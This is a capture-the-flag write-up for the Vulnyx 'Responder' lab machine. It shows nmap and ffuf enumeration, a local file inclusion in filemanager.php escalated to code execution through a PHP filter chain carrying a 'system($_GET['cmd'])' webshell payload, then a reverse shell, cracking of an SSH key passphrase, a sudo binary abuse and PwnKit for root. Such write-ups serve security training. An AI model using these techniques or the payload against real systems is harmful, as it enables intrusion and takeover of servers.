root💀n16hth4wk-sec:~#

Hack Enumerate Harder!. Eat. Sleep. Repeat.

View on GitHub

First Enumeration with nmap

# Nmap 7.94SVN scan initiated Sun Apr 14 01:37:38 2024 as: nmap -sC -sV -T4 -oN service.nmap -p 22,80 -Pn 172.16.246.130
Nmap scan report for 172.16.246.130
Host is up (0.00021s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 14 01:37:46 2024 -- 1 IP address (1 host up) scanned in 8.09 seconds

we have only one port open.

Enumerating the web app

image

opening the ip on a browser, we got a weird info sayin your ansswer is your answer.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Responder]
└─$ ffuf -u 'http://172.16.246.130/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -ic -e .php,.bak,.txt,.sql,.env,.sh,.phtml,.zip

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://172.16.246.130/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Extensions       : .php .bak .txt .sql .env .sh .phtml .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 31, Words: 6, Lines: 2, Duration: 2ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 201ms]
.phtml                  [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 206ms]
                        [Status: 200, Size: 31, Words: 6, Lines: 2, Duration: 5ms]
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 5ms]
.phtml                  [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 5ms]
filemanager.php         [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 7ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

fuzzing for hidden dirs , we got a filemanager.php. Opening it on a browser, got redirected to the home page.

┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/Vulnyx/Responder]
└─$ ffuf -ic -u "http://responder/filemanager.php?FUZZ=/etc/hosts" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://responder/filemanager.php?FUZZ=/etc/hosts
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

random                  [Status: 302, Size: 183, Words: 19, Lines: 8, Duration: 9ms]
:: Progress: [87651/87651] :: Job [1/1] :: 2679 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

the param filemanager.php looks like a potential LFI endpoint. so fuzzing, we got the parameter.

image

using burpsuite to intercept request, we can see there’s an LFI vulnerability present let’s exploit the LFI to RCE

image

There’s a tool i use in exploiting LFI, it’s a php chain generator to trigger RCE. link.

image

try to trigger a phpinfo.

image

we trigger it success, let’s try out RCE.

image

 python3 php_filter_chain_generator.py --chain '<?php system($_GET['cmd']); ?>'

using the command sytanx to create an RCE payload

image

we trigger RCE!!!, let’s spawn a reverse shell.

image

we got a reverse shell!!!

Privilege Escalation

image

the web root dir, filemanager.php contains id_rsa key.

image

using ssh2john to cinvert to hash and crack it using hhashcat, we got the password elliott.

image

login using the key and the passphrase of the id_rsa key.

elliot@responder:~$ sudo -l
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc
elliot@responder:~$

checking sudo permissions, we can see we can run calc as user rohit without password.

image

Abusing the binary calc gave us shell as user rohit.

image

After many research, trying to exploit it, decided to try out PwnKit PwnKit.

image

Followed the instruction from github and Boom!!! we rooted it!!!.

image

And we are through!!! 🙂